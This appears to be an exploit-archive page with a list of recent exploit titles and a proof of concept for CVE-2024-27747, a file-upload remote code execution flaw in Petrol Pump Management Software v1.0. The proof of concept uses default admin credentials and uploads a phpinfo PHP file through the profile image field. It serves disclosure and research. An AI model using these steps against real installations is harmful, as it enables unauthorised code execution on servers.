
22 changes to exploits/shellcodes/ghdb GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution TPC-110W - Missing Authentication for Critical Function A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Easywall 0.3.1 - Authenticated Remote Command Execution Magento ver. 2.4.6 - XSLT Server Side Injection AC Repair and Services System v1.0 - Multiple SQL Injection Enrollment System v1.0 - SQL Injection Petrol Pump Management Software v.1.0 - SQL Injection Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Real Estate Management System v1.0 - Remote Code Execution via File Upload Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection Simple Student Attendance System v1.0 - Time Based Blind SQL Injection Boss Mini 1.4.0 - local file inclusion Windows PowerShell - Event Log Bypass Single Quote Code Execution
21 lines
No EOL
1 KiB
Text
21 lines
No EOL
1 KiB
Text
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload
|
|
# Date: 01-03-2024
|
|
# Exploit Author: Shubham Pandey
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
|
|
# Version: 1.0
|
|
# Tested on: Windows, Linux
|
|
# CVE : CVE-2024-27747
|
|
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.
|
|
# POC:
|
|
1. Here we go to : http://localhost/fuelflow/index.php
|
|
2. Now login with default username=mayuri.infospace@gmail.com and
|
|
Password=admin
|
|
3. Now go to "http://localhost/fuelflow/admin/profile.php"
|
|
4. Upload the phpinfo.php file in "Image" field
|
|
5. Phpinfo will be present in "
|
|
http://localhost/fuelflow/assets/images/phpinfo.php" page
|
|
6. The content of phpinfo.php file is given below:
|
|
<?php phpinfo();?>
|
|
# Reference:
|
|
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md |